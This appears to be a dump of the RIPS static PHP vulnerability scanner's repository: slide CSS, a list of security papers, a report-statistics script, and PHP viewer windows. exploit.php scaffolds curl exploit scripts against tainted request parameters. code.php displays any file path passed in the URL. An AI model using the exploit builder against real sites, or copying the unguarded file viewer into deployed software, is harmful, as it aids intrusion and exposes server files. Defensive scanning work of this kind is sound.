article:not(.nobackground):not(.biglogo), .slides.layout-faux-widescreen > article:not(.nobackground):not(.biglogo) { background-position-x: 0, 840px; } /* Clickable/tappable areas */ .slide-area { z-index: 1000; position: absolute; left: 0; top: 0; width: 150px; height: 700px; left: 50%; top: 50%; cursor: pointer; margin-top: -350px; tap-highlight-color: transparent; -o-tap-highlight-color: transparent; -moz-tap-highlight-color: transparent; -webkit-tap-highlight-color: transparent; } #prev-slide-area { margin-left: -550px; } #next-slide-area { margin-left: 400px; } .slides.layout-widescreen #prev-slide-area, .slides.layout-faux-widescreen #prev-slide-area { margin-left: -650px; } .slides.layout-widescreen #next-slide-area, .slides.layout-faux-widescreen #next-slide-area { margin-left: 500px; } /* Slide styles */ .slides.template-default article.biglogo { background: white url(images/google-logo.png) 50% 50% no-repeat; } .slides.template-io2011 article.biglogo { background: white url(images/googleio-logo.png) 50% 50% no-repeat; background-size: 600px; } /* Slides */ .slides > article { display: none; } .slides > article.far-past { display: block; transform: translate(-2040px); -o-transform: translate(-2040px); -moz-transform: translate(-2040px); -webkit-transform: translate3d(-2040px, 0, 0); } .slides > article.past { display: block; transform: translate(-1020px); -o-transform: translate(-1020px); -moz-transform: translate(-1020px); -webkit-transform: translate3d(-1020px, 0, 0); } .slides > article.current { display: block; transform: translate(0); -o-transform: translate(0); -moz-transform: translate(0); -webkit-transform: translate3d(0, 0, 0); } .slides > article.next { display: block; transform: translate(1020px); -o-transform: translate(1020px); -moz-transform: translate(1020px); -webkit-transform: translate3d(1020px, 0, 0); } .slides > article.far-next { display: block; transform: translate(2040px); -o-transform: translate(2040px); -moz-transform: translate(2040px); -webkit-transform: translate3d(2040px, 0, 0); } .slides.layout-widescreen > article.far-past, .slides.layout-faux-widescreen > article.far-past { display: block; transform: translate(-2260px); -o-transform: translate(-2260px); -moz-transform: translate(-2260px); -webkit-transform: translate3d(-2260px, 0, 0); } .slides.layout-widescreen > article.past, .slides.layout-faux-widescreen > article.past { display: block; transform: translate(-1130px); -o-transform: translate(-1130px); -moz-transform: translate(-1130px); -webkit-transform: translate3d(-1130px, 0, 0); } .slides.layout-widescreen > article.current, .slides.layout-faux-widescreen > article.current { display: block; transform: translate(0); -o-transform: translate(0); -moz-transform: translate(0); -webkit-transform: translate3d(0, 0, 0); } .slides.layout-widescreen > article.next, .slides.layout-faux-widescreen > article.next { display: block; transform: translate(1130px); -o-transform: translate(1130px); -moz-transform: translate(1130px); -webkit-transform: translate3d(1130px, 0, 0); } .slides.layout-widescreen > article.far-next, .slides.layout-faux-widescreen > article.far-next { display: block; transform: translate(2260px); -o-transform: translate(2260px); -moz-transform: translate(2260px); -webkit-transform: translate3d(2260px, 0, 0); } /* Styles for slides */ .slides > article { font-family: 'Open Sans', Arial, sans-serif; color: rgb(102, 102, 102); text-shadow: 0 1px 1px rgba(0, 0, 0, .1); font-size: 30px; line-height: 36px; letter-spacing: -1px; } b { font-weight: 600; } .blue { color: rgb(0, 102, 204); } .yellow { color: rgb(255, 211, 25); } .green { color: rgb(0, 138, 53); } .red { color: rgb(255, 0, 0); } .black { color: black; } .white { color: white; } a { color: rgb(0, 102, 204); } a:visited { color: rgba(0, 102, 204, .75); } a:hover { color: black; } p { margin: 0; padding: 0; margin-top: 20px; } p:first-child { margin-top: 0; } h1 { font-size: 60px; line-height: 60px; padding: 0; margin: 0; margin-top: 200px; padding-right: 40px; font-weight: 600; letter-spacing: -3px; color: rgb(51, 51, 51); } h2 { font-size: 45px; line-height: 45px; position: absolute; bottom: 150px; padding: 0; margin: 0; padding-right: 40px; font-weight: 600; letter-spacing: -2px; color: rgb(51, 51, 51); } h3 { font-size: 30px; line-height: 36px; padding: 0; margin: 0; padding-right: 40px; font-weight: 600; letter-spacing: -1px; color: rgb(51, 51, 51); } article.fill h3 { background: rgba(255, 255, 255, .75); padding-top: .2em; padding-bottom: .3em; margin-top: -.2em; margin-left: -60px; padding-left: 60px; margin-right: -60px; padding-right: 60px; } ul { list-style: none; margin: 0; padding: 0; margin-top: 40px; margin-left: .75em; } ul:first-child { margin-top: 0; } ul ul { margin-top: .5em; } li { padding: 0; margin: 0; margin-bottom: .5em; } li::before { content: '·'; width: .75em; margin-left: -.75em; position: absolute; } pre { font-family: 'Droid Sans Mono', 'Courier New', monospace; font-size: 20px; line-height: 28px; padding: 5px 10px; letter-spacing: -1px; margin-top: 40px; margin-bottom: 40px; color: black; background: rgb(240, 240, 240); border: 1px solid rgb(224, 224, 224); box-shadow: inset 0 2px 6px rgba(0, 0, 0, .1); overflow: hidden; } code { font-size: 95%; font-family: 'Droid Sans Mono', 'Courier New', monospace; color: black; } iframe { width: 100%; height: 620px; background: white; border: 1px solid rgb(192, 192, 192); margin: -1px; /*box-shadow: inset 0 2px 6px rgba(0, 0, 0, .1);*/ } h3 + iframe { margin-top: 40px; height: 540px; } article.fill iframe { position: absolute; left: 0; top: 0; width: 100%; height: 100%; border: 0; margin: 0; border-radius: 10px; -o-border-radius: 10px; -moz-border-radius: 10px; -webkit-border-radius: 10px; z-index: -1; } article.fill img { position: absolute; left: 0; top: 0; min-width: 100%; min-height: 100%; border-radius: 10px; -o-border-radius: 10px; -moz-border-radius: 10px; -webkit-border-radius: 10px; z-index: -1; } img.centered { margin: 0 auto; display: block; } table { width: 100%; border-collapse: collapse; margin-top: 40px; } th { font-weight: 600; text-align: left; } td, th { border: 1px solid rgb(224, 224, 224); padding: 5px 10px; vertical-align: top; } .source { position: absolute; left: 60px; top: 644px; padding-right: 175px; font-size: 15px; letter-spacing: 0; line-height: 18px; } q { display: block; font-size: 60px; line-height: 72px; margin-left: 20px; margin-top: 100px; margin-right: 150px; } q::before { content: '“'; position: absolute; display: inline-block; margin-left: -2.1em; width: 2em; text-align: right; font-size: 90px; color: rgb(192, 192, 192); } q::after { content: '”'; position: absolute; margin-left: .1em; font-size: 90px; color: rgb(192, 192, 192); } div.author { text-align: right; font-size: 40px; margin-top: 20px; margin-right: 150px; } div.author::before { content: '—'; } /* Size variants */ article.smaller p, article.smaller ul { font-size: 20px; line-height: 24px; letter-spacing: 0; } article.smaller table { font-size: 20px; line-height: 24px; letter-spacing: 0; } article.smaller pre { font-size: 15px; line-height: 20px; letter-spacing: 0; } article.smaller q { font-size: 40px; line-height: 48px; } article.smaller q::before, article.smaller q::after { font-size: 60px; } /* Builds */ .build > * { transition: opacity 0.5s ease-in-out 0.2s; -o-transition: opacity 0.5s ease-in-out 0.2s; -moz-transition: opacity 0.5s ease-in-out 0.2s; -webkit-transition: opacity 0.5s ease-in-out 0.2s; } .to-build { opacity: 0; } /* Pretty print */ .prettyprint .str, /* string content */ .prettyprint .atv { /* a markup attribute value */ color: rgb(0, 138, 53); } .prettyprint .kwd, /* a keyword */ .prettyprint .tag { /* a markup tag name */ color: rgb(0, 102, 204); } .prettyprint .com { /* a comment */ color: rgb(127, 127, 127); font-style: italic; } .prettyprint .lit { /* a literal value */ color: rgb(127, 0, 0); } .prettyprint .pun, /* punctuation, lisp open bracket, lisp close bracket */ .prettyprint .opn, .prettyprint .clo { color: rgb(127, 127, 127); } .prettyprint .typ, /* a type name */ .prettyprint .atn, /* a markup attribute name */ .prettyprint .dec, .prettyprint .var { /* a declaration; a variable name */ color: rgb(127, 0, 127); } ================================================ FILE: papers/README.md ================================================ # Papers by Johannes Dahse 2016 * [Static detection of complex vulnerabilities in modern PHP applications](https://d-nb.info/1099703417/34) (dissertation) * [No Honor Among Thieves: A Large-Scale Analysis of Malicious Web Shells](http://www.cyber-investigator.org/wp-content/uploads/2016/04/webshells_www2016.pdf) 2015 * [Experience report: an empirical study of PHP security mechanism usage](http://syssec.rub.de/media/emma/veroeffentlichungen/2015/05/27/sanitization_issta15.pdf) * [Security Analysis of PHP Bytecode Protection Mechanisms](https://pdfs.semanticscholar.org/0c37/61f05ac238d58194a41323018f7c21907b05.pdf) 2014 * [Code Reuse Attacks in PHP: Automated POP Chain Generation](https://www.ei.rub.de/media/emma/veroeffentlichungen/2014/09/10/POPChainGeneration-CCS14.pdf) * [Simulation of Built-in PHP Features for Precise Static Code Analysis](http://wp.internetsociety.org/ndss/wp-content/uploads/sites/25/2017/09/04_5_0.pdf) [Slides](http://wp.internetsociety.org/ndss/wp-content/uploads/sites/25/2017/09/04_5_slides.pdf) * [Static Detection of Second-Order Vulnerabilities in Web Applications](https://www.usenix.org/system/files/conference/usenixsecurity14/sec14-paper-dahse.pdf) [Slides](https://www.usenix.org/sites/default/files/conference/protected-files/sec14_slides_dahse.pdf) 2010 * [RIPS - A static source code analyser for vulnerabilities in PHP scripts](https://sourceforge.net/projects/rips-scanner/files/rips-paper.pdf/download) (seminar work) * [RIPS - A static source code analyser for vulnerabilities in PHP scripts](http://php-security.org/downloads/rips.pdf) [Slides](https://websec.files.wordpress.com/2010/11/rips-slides.pdf) # Other Sources 2012 * [linux.com.au 2012: Finding Vulnerabilities in PHP code](http://peter.serwylo.com/?p=115) [YouTube](https://www.youtube.com/watch?v=zrXFGjJyP8M) 2011 * [toolsmith: RIPS - A static source code analyser for vulnerabilities in PHP scripts](http://www.issa.org/resource/resmgr/PDF/McRee-toolsmith.pdf) ================================================ FILE: rips_stats.py ================================================ #! /usr/bin/env python # -*- coding: UTF-8 -*- # Author : tintinweb@oststrom.com <github.com/tintinweb> # # minimal dependencies, we do not require a fully blown html parser, beautifulsoup # and others import sys, re, os STATS_BEGIN = '<div id="stats" class="stats">' STATS_END = '<div class="filebox">' def getargs(): ''' minimalistic argparse ''' args = [] options = [] if len(sys.argv) <= 1: print """Usage: %s [<report.html>, ...]"""%sys.argv[0] exit(1) for a in sys.argv[1:]: if a.startswith("--"): options.append(a) else: args.append(a) return args, options def extract_td_single(column_name,data): ''' utility function to extract data column text ''' d = re.findall(r'%s</td><td[^>]*>([^<]+)'%column_name,data,re.MULTILINE|re.DOTALL) if d: return d[0] return '' def main(args, options=[]): errcode = 0 stats={} for file in args: print "[*] processing '%s'"%file if not os.path.isfile(file): print "[!!] file not found/not a file - '%s'"%file continue with open(file,'r') as f: data = None # performance - reduce regex searchspace; extract stats div for line in f.readlines(): if data: data += line if STATS_BEGIN in line: data = line[line.index(STATS_BEGIN):] continue if STATS_END in line: break if data: print "[**] extracting data" x = re.findall(r'Sum:</td><td>(\d+)</td>', data) stats['hits'] = int(x[0]) if x else 0 # if Sum: is missing, there were not vulns. stats['cats'] = re.findall(r'catshow\(\'([^\']+)', data) stats['num_cats']=len(stats['cats']) x = re.findall(r'<span id="scantime">(\d+\.\d+) seconds</span>',data) stats['scantime'] = x[0] if x else None for s in ("Scanned files:", "Include success:", "Considered sinks:", "User-defined functions:","Unique sources:","Sensitive sinks:"): stats[s] = extract_td_single(s, data).strip() stats['dummy']='' print "[***] Results" print """[ ] Scanned Files: %(Scanned files:)20s [ ] Include Success: %(Include success:)20s [ ] Time Elapsed: %(scantime)19ss [ ] Considered sinks: %(Considered sinks:)20s [ ] User-defined functions: %(User-defined functions:)20s [ ] Unique sources: %(Unique sources:)20s [ ] Sensitive sinks: %(Sensitive sinks:)20s [ ] Hits: %(hits)20s [ ] Categories: %(num_cats)20s"""%stats for c in stats.get("cats",[]): print " %50s"%("%s [+]"%c) errcode+=stats.get('hits',0) return errcode if __name__=='__main__': args, options = getargs() sys.exit(main(args,options)) ================================================ FILE: windows/code.php ================================================ <table width='100%'> <?php /** RIPS - A static source code analyser for vulnerabilities in PHP scripts by Johannes Dahse (johannes.dahse@rub.de) Copyright (C) 2012 Johannes Dahse This program is free software; you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation; either version 3 of the License, or (at your option) any later version. This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details. You should have received a copy of the GNU General Public License along with this program; if not, see <http://www.gnu.org/licenses/>. **/ include('../config/general.php'); // prepare output to style with CSS function highlightline($line, $line_nr, $marklines, $in_comment) { $tokens = @token_get_all('<? '.$line.' ?>'); $output = (in_array($line_nr, $marklines)) ? '<tr><td nowrap class="markline">' : '<tr><td nowrap class="codeline">'; for($i=0; $i<count($tokens); $i++) { if(is_array($tokens[$i]) && ($tokens[$i][0] === T_COMMENT || $tokens[$i][0] === T_DOC_COMMENT) && ($tokens[$i][1][0] === '/' && $tokens[$i][1][1] === '*' && substr(trim($tokens[$i][1]),-2,2) !== '*/')) { $in_comment = true; if(is_array($tokens[$i])) $tokens[$i][1] = str_replace('?'.'>', '', $tokens[$i][1]); } if($tokens[$i] === '/' && $tokens[$i-1] === '*') { $in_comment = false; } if($i == count($tokens)-1 && $tokens[$i-1][0] !== T_CLOSE_TAG) $tokens[$i][1] = str_replace('?'.'>', '', $tokens[$i][1]); if($in_comment) { if($tokens[$i][1] !== '<?' && $tokens[$i][1] !== '?'.'>') { $trimmed = is_array($tokens[$i]) ? trim($tokens[$i][1]) : trim($tokens[$i]); $output .= '<span class="phps-t-comment">'; $output .= empty($trimmed) ? ' ' : htmlentities($trimmed, ENT_QUOTES, 'utf-8'); $output .= '</span>'; } } else if($tokens[$i] === '/' && $tokens[$i-1] === '*') $output .= '<span class="phps-t-comment">*/</span>'; else if (is_string($tokens[$i])) { $output .= '<span class="phps-code">'; $output .= htmlentities(trim($tokens[$i]), ENT_QUOTES, 'utf-8'); $output .= '</span>'; } else if (is_array($tokens[$i]) && $tokens[$i][0] !== T_OPEN_TAG && $tokens[$i][0] !== T_CLOSE_TAG) { if ($tokens[$i][0] !== T_WHITESPACE) { $text = '<span '; if($tokens[$i][0] === T_VARIABLE) { $cssname = str_replace('$', '', $tokens[$i][1]); $text.= 'style="cursor:pointer;" name="phps-var-'.$cssname.'" onClick="markVariable(\''.$cssname.'\')" '; $text.= 'onmouseover="markVariable(\''.$cssname.'\')" onmouseout="markVariable(\''.$cssname.'\')" '; } else if($tokens[$i][0] === T_STRING && $tokens[$i+1] === '(' && $tokens[$i-2][0] !== T_FUNCTION) { $text.= 'onmouseover="mouseFunction(\''.strtolower($tokens[$i][1]).'\', this)" onmouseout="this.style.textDecoration=\'none\'" '; $text.= 'onclick="openFunction(\''.strtolower($tokens[$i][1])."','$line_nr');\" "; } $text.= 'class="phps-'.str_replace('_', '-', strtolower(token_name($tokens[$i][0]))).'" '; $text.= '>'.htmlentities($tokens[$i][1], ENT_QUOTES, 'utf-8').'</span>'; } else { $text = str_replace(' ', ' ', $tokens[$i][1]); $text = str_replace("\t", str_repeat(' ', 8), $text); } $output .= $text; } } if(strstr($line, '*/')) $in_comment = false; echo $output.'</td></tr>'; return $in_comment; } // print source code and mark lines $file = $_GET['file']; $marklines = explode(',', $_GET['lines']); $ext = '.'.pathinfo($file, PATHINFO_EXTENSION); if(!empty($file) && is_file($file) && in_array($ext, $FILETYPES)) { $lines = file($file); // place line numbers in extra table for more elegant copy/paste without line numbers echo '<tr><td><table>'; for($i=1, $max=count($lines); $i<=$max;$i++) echo "<tr><td class=\"linenrcolumn\"><span class=\"linenr\">$i</span><A id='".($i+2).'\'></A></td></tr>'; echo '</table></td><td id="codeonly"><table id="codetable" width="100%">'; $in_comment = false; for($i=0; $i<$max; $i++) { $in_comment = highlightline($lines[$i], $i+1, $marklines, $in_comment); } } else { echo '<tr><td>Invalid file specified.</td></tr>'; } ?> </table> </td></tr></table> ================================================ FILE: windows/exploit.php ================================================ <?php /** RIPS - A static source code analyser for vulnerabilities in PHP scripts by Johannes Dahse (johannes.dahse@rub.de) Copyright (C) 2012 Johannes Dahse This program is free software; you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation; either version 3 of the License, or (at your option) any later version. This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details. You should have received a copy of the GNU General Public License along with this program; if not, see <http://www.gnu.org/licenses/>. **/ if(!empty($_GET['file'])) { $file = $_GET['file']; ?> <div style="padding: 20px; width: 400px"> <div style='width: 300px'> #!/usr/bin/php -f<br> <?php<br> #<br> # <?php echo htmlentities(basename($file), ENT_QUOTES, 'utf-8'); ?> curl exploit<br> #<br><br> </div> <div id="exploitbuild"> <div class="exploitbox"> <div class="exploittitlebox"> <div class="exploittitle">general settings:</div> <div style="clear: left;"></div> </div> <div class="exploitcontentbox"> <table class="textcolor"> <tr> <td>URL:</td> <td><input type="text" size="40" id="target" name="target" value="http://$target/<?php echo htmlentities(basename($file), ENT_QUOTES, 'utf-8'); ?>" /></td> </tr> <tr> <td>COOKIEJAR:</td> <td><input type="text" id="cookiejar" name="cookiejar" value="/tmp/cookie_$target" /></td> </tr> <tr> <td>Max Exec Time:</td> <td><input type="text" id="exectime" size=2 name="exectime" value="3" /> (s)</td> </tr> <tr> <td>SSL: <input type="checkbox" id="ssl" name="ssl" value="1" onChange="setssl()" /></td> <td>BasicAuth: <input type="checkbox" id="auth" name="auth" value="1" /></td> </tr> </table> </div> </div> <?php function creatediv($method, $name) { if(!empty($method)) { $method = htmlentities($method, ENT_QUOTES, 'utf-8'); ?> <div id="<?php echo $name.'box'; ?>" class="exploitbox"> <div class="exploittitlebox"> <div class="exploittitle"><?php echo $name ?> parameter:</div> <input type="button" class="closebutton" style="position:relative;top:4px;right:5px;" value="x" onClick="deleteMethod('<?php echo $name; ?>')" /> <div style="clear: left;"></div> </div> <div class="exploitcontentbox"> <form id="<?php echo $name; ?>"> <table class="textcolor" cellspacing=0px cellpadding=2px> <?php $params = explode(',', $method); foreach($params as $param) { if($name != '$_SERVER' || ($name == '$_SERVER' && substr($param,0,4) == 'HTTP')) { $param = htmlentities($param, ENT_QUOTES, 'utf-8'); if($param == '*') $param = 'foobar'; echo "\n<tr><td>$param:</td>\n", "\t<td><input type='text' name='$param' value=''></td>\n", '</tr>'; } else { echo "\n<tr><td colspan='2'>You can taint \$_SERVER['$param'] by editing the target URL.</td></tr>\n"; } } ?> </table> </form> </div> </div> <?php } } if(isset($_GET['get'])) creatediv($_GET['get'], '$_GET'); if(isset($_GET['post'])) creatediv($_GET['post'], '$_POST'); if(isset($_GET['cookie'])) creatediv($_GET['cookie'], '$_COOKIE'); if(isset($_GET['files'])) creatediv($_GET['files'], '$_FILES'); if(isset($_GET['server'])) creatediv($_GET['server'], '$_SERVER'); ?> <input type="button" class="Button" value="create" onClick="createExploit()" /> <br /><br /> </div> <div id="exploitcode" style="display:none;"></div> ?> </div> <?php } else { echo 'No file loaded'; } ?> ================================================ FILE: windows/function.php ================================================ <table width='100%'> <?php /** RIPS - A static source code analyser for vulnerabilities in PHP scripts by Johannes Dahse (johannes.dahse@rub.de) Copyright (C) 2012 Johannes Dahse This program is free software; you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation; either version 3 of the License, or (at your option) any later version. This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details. You should have received a copy of the GNU General Public License along with this program; if not, see <http://www.gnu.org/licenses/>. **/ include('../config/general.php'); // prepare output to style with CSS function highlightline($line, $line_nr) { $tokens = @token_get_all('<? '.$line.' ?>'); $output = "<tr><td class=\"linenrcolumn\" valign=\"top\"><span class=\"linenr\">$line_nr</span> </td><td>"; foreach ($tokens as $token) { if (is_string($token)) { $output .= '<span class="phps-code">'; $output .= htmlentities($token, ENT_QUOTES, 'utf-8'); $output .= '</span>'; } else if (is_array($token) && $token[0] !== T_OPEN_TAG && $token[0] !== T_CLOSE_TAG) { if ($token[0] !== T_WHITESPACE) { $text = '<span class="phps-'.str_replace('_', '-', strtolower(token_name($token[0]))).'">'; $text.= htmlentities($token[1], ENT_QUOTES, 'utf-8').'</span>'; } else { $text = str_replace(' ', ' ', $token[1]); $text = str_replace("\t", str_repeat(' ', 8), $text); } $output .= $text; } } return $output.'</td></tr>'; } // print function code $file = $_GET['file']; $start = (int)$_GET['start']; $end = (int)$_GET['end']; $ext = '.'.pathinfo($file, PATHINFO_EXTENSION); if(!empty($file) && is_file($file) && in_array($ext, $FILETYPES)) { $lines = file($file); if( isset($lines[$start]) && isset($lines[$end]) ) { for($i=$start; $i<=$end; $i++) { echo highlightline($lines[$i], $i); } } else { echo '<tr><td>Sorry, wrong file referenced.</td></tr>'; } } else { echo '<tr><td>Sorry, no file referenced.</td></tr>'; } ?> </table> ================================================ FILE: windows/help.php ================================================ <?php /** RIPS - A static source code analyser for vulnerabilities in PHP scripts by Johannes Dahse (johannes.dahse@rub.de) Copyright (C) 2012 Johannes Dahse This program is free software; you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation; either version 3 of the License, or (at your option) any later version. This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details. You should have received a copy of the GNU General Public License along with this program; if not, see <http://www.gnu.org/licenses/>. **/ include '../config/general.php'; include '../config/securing.php'; include '../config/sinks.php'; include '../config/tokens.php'; include '../config/sources.php'; include '../config/help.php'; include '../lib/printer.php'; $function = htmlentities($_GET['function'], ENT_QUOTES, 'utf-8'); $type = htmlentities($_GET['type'], ENT_QUOTES, 'utf-8'); $type = explode(" (", $type); $type = $type[0]; switch($type) { case $NAME_XSS: $HELP = $HELP_XSS; $FUNCS = $F_SECURING_XSS; break; case $NAME_HTTP_HEADER: $HELP = $HELP_HTTP_HEADER; $FUNCS = array(); break; case $NAME_SESSION_FIXATION: $HELP = $HELP_SESSION_FIXATION; $FUNCS = array(); break; case $NAME_CODE: $HELP = $HELP_CODE; $FUNCS = $F_SECURING_PREG; break; case $NAME_REFLECTION: $HELP = $HELP_REFLECTION; $FUNCS = array(); break; case $NAME_FILE_INCLUDE: $HELP = $HELP_FILE_INCLUDE; $FUNCS = $F_SECURING_FILE; break; case $NAME_FILE_READ: $HELP = $HELP_FILE_READ; $FUNCS = $F_SECURING_FILE; break; case $NAME_FILE_AFFECT: $HELP = $HELP_FILE_AFFECT; $FUNCS = $F_SECURING_FILE; break; case $NAME_EXEC: $HELP = $HELP_EXEC; $FUNCS = $F_SECURING_SYSTEM; break; case $NAME_DATABASE: $HELP = $HELP_DATABASE; $FUNCS = $F_SECURING_SQL; break; case $NAME_XPATH: $HELP = $HELP_XPATH; $FUNCS = $F_SECURING_XPATH; break; case $NAME_LDAP: $HELP = $HELP_LDAP; $FUNCS = $F_SECURING_LDAP; break; case $NAME_CONNECT: $HELP = $HELP_CONNECT; $FUNCS = array(); break; case $NAME_POP: $HELP = $HELP_POP; $FUNCS = array(); break; default: $HELP = array( 'description' => 'No description available for this vulnerability.', 'link' => '', 'code' => 'Not available.', 'poc' => 'Not available.' ); break; } ?> <div style="padding-left:30px;padding-right:30px"> <h2><?php echo $type; ?></h2> <h3>vulnerability concept:</h3> <table class="textcolor"> <tr> <th class="helptitle">source</th> <th></th> <th class="helptitle">sink</th> <th></th> <th class="helptitle">vulnerability</th> </tr> <tr> <td align="left" class="helpbox"> <ul style="margin-left:-25px"> <?php if($_GET['get'] || (empty($_GET['get']) && empty($_GET['post']) && empty($_GET['cookie']) && empty($_GET['files']) && empty($_GET['server']))) echo '<li class="userinput"><a href="'.PHPDOC.'reserved.variables.get" target="_blank">$_GET</a></li>'; if($_GET['post']) echo '<li class="userinput"><a href="'.PHPDOC.'reserved.variables.post" target="_blank">$_POST</a></li>';; if($_GET['cookie']) echo '<li class="userinput"><a href="'.PHPDOC.'reserved.variables.cookie" target="_blank">$_COOKIE</a></li>'; if($_GET['files']) echo '<li class="userinput"><a href="'.PHPDOC.'reserved.variables.files" target="_blank">$_FILES</a></li>'; if($_GET['server']) echo '<li class="userinput"><a href="'.PHPDOC.'reserved.variables.server" target="_blank">$_SERVER</a></li>'; ?> </ul> </td> <td align="center" valign="center"><h1>+</h1></td> <td align="center" class="helpbox"> <?php echo '<a class="link" href="'.PHPDOC.$function.'" target="_blank">'.$function.'()</a>'; ?> </td> <td align="center" valign="center"><h1>=</h1></td> <td align="center" class="helpbox"> <?php echo $type; ?> </td> </tr> </table> <h3>vulnerability description:</h3> <p><?php echo $HELP['description']; ?></p> <p><?php if(!empty($HELP['link'])) echo "More information about $type can be found <a href=\"{$HELP['link']}\" target=\"_blank\">here</a>."; ?></p> <h3>vulnerable example code:</h3> <pre><?php echo highlightline(token_get_all($HELP['code']), '', 1); ?></pre> <h3>proof of concept:</h3> <p><?php echo htmlentities($HELP['poc']); ?></p> <h3>patch:</h3> <p><?php echo htmlentities($HELP['patchtext']); ?></p> <pre><?php echo highlightline(token_get_all($HELP['patch']), '', 1); ?></pre> <h3>related securing functions:</h3> <ul> <?php if(!empty($FUNCS)) { foreach($FUNCS as $func) { echo '<li><a class="darkcolor" href="'.PHPDOC.$func.'" target="_blank">'.$func."</a></li>\n"; } } else { echo 'None.'; } ?> </ul> </div> ================================================ FILE: windows/hotpatch.php ================================================ <?php /** RIPS - A static source code analyser for vulnerabilities in PHP scripts by Johannes Dahse (johannes.dahse@rub.de) Copyright (C) 2012 Johannes Dahse This program is free software; you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation; either version 3 of the License, or (at your option) any later version. This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details. You should have received a copy of the GNU General Public License along with this program; if not, see <http://www.gnu.org/licenses/>. **/ if(!empty($_GET['file'])) { $file = $_GET['file']; ?> <div style="padding: 20px; width: 400px"> <div id="hotpatchbuild"> Create mod_security rule. <?php function getFilterOptions($id) { return '<select name="filter" onchange="document.getElementById('.$id.').value=this.value">' .'<option value="alpha">alphanum</option>' .'<option value="alpha">numerical</option>' .'</select>'; } function creatediv($method, $name) { if(!empty($method)) { $method = htmlentities($method, ENT_QUOTES, 'utf-8'); ?> <div id="<?php echo $name.'box'; ?>" class="exploitbox"> <div class="exploittitlebox"> <div class="exploittitle"><?php echo $name ?> parameter:</div> <input type="button" class="closebutton" style="position:relative;top:4px;right:5px;" value="x" onClick="deleteMethod('<?php echo $name; ?>')" /> <div style="clear: left;"></div> </div> <div class="exploitcontentbox"> <form id="<?php echo $name; ?>"> <table class="textcolor" cellspacing=0px cellpadding=2px> <?php $params = explode(',', $method); foreach($params as $param) { if($name != '$_SERVER' || ($name == '$_SERVER' && substr($param,0,4) == 'HTTP')) { $param = htmlentities($param, ENT_QUOTES, 'utf-8'); echo "\n<tr><td>$param:</td>\n", "\t<td><input type='text' id='{$method}{$param}' name='$param' value='' /></td>", "<td>".getFilterOptions($method.$param)."</td>\n", '</tr>'; } else { echo "\n<tr><td colspan='2'>You can taint \$_SERVER['$param'] by editing the target URL.</td></tr>\n"; } } ?> </table> </form> </div> </div> <?php } } if(isset($_GET['get'])) creatediv($_GET['get'], '$_GET'); if(isset($_GET['post'])) creatediv($_GET['post'], '$_POST'); if(isset($_GET['cookie'])) creatediv($_GET['cookie'], '$_COOKIE'); if(isset($_GET['files'])) creatediv($_GET['files'], '$_FILES'); if(isset($_GET['server'])) creatediv($_GET['server'], '$_SERVER'); ?> <input type="button" class="Button" value="create" onClick="createHotpatch()" /> <br /><br /> </div> <div id="hotpatchcode"> </div> <?php } else { echo 'No file loaded'; } ?> </div> ================================================ FILE: windows/leakscan.php ================================================ <?php /** RIPS - A static source code analyser for vulnerabilities in PHP scripts by Johannes Dahse (johannes.dahse@rub.de) Copyright (C) 2012 Johannes Dahse This program is free software; you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation; either version 3 of the License, or (at your option) any later version. This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details. You should have received a copy of the GNU General Public License along with this program; if not, see <http://www.gnu.org/licenses/>. **/ ############################### INCLUDES ################################ include('../config/general.php'); // general settings include('../config/sources.php'); // tainted variables and functions include('../config/tokens.php'); // tokens for lexical analysis include('../config/securing.php'); // securing functions include('../config/sinks.php'); // sensitive sinks include('../config/info.php'); // interesting functions include('../lib/constructer.php'); // classes include('../lib/filer.php'); // read files from dirs and subdirs include('../lib/tokenizer.php'); // prepare and fix token list include('../lib/analyzer.php'); // string analyzers include('../lib/scanner.php'); // scan for sinks in token list include('../lib/printer.php'); // output scan result include('../lib/searcher.php'); // search functions ############################### MAIN #################################### $start = microtime(TRUE); $output = array(); $info = array(); $scanned_files = array(); if(!empty($_POST['loc'])) { $location = realpath($_POST['loc']); if(is_dir($location)) { $scan_subdirs = isset($_POST['subdirs']) ? $_POST['subdirs'] : false; $files = read_recursiv($location, $scan_subdirs); if(count($files) > WARNFILES && !isset($_POST['ignore_warning'])) die('warning:'.count($files)); } else if(is_file($location) && in_array(substr($location, strrpos($location, '.')), $FILETYPES)) { $files[0] = $location; } else { $files = array(); } // SCAN $user_functions = array(); $user_functions_offset = array(); $file_sinks_count = array(); $user_input = array(); $count_xss=$count_sqli=$count_fr=$count_fa=$count_fi=$count_exec=$count_code=$count_eval=$count_xpath=$count_ldap=$count_con=$count_other=$count_pop=$count_inc=$count_inc_fail=$count_header=0; $verbosity = 3; $scan_functions = array_merge($F_XSS, $F_HTTP_HEADER, $F_SESSION_FIXATION); $F_USERINPUT = array(); $V_USERINPUT = array($_POST['varname']); $F_SECURING_XSS = array(); $_POST['vector'] = 'client'; $overall_time = 0; $timeleft = 0; $file_amount = count($files); for($fit=0; $fit<$file_amount; $fit++) { // for scanning display $thisfile_start = microtime(TRUE); $file_scanning = $files[$fit]; echo ($fit) . '|' . $file_amount . '|' . $file_scanning . '|' . $timeleft . '|' 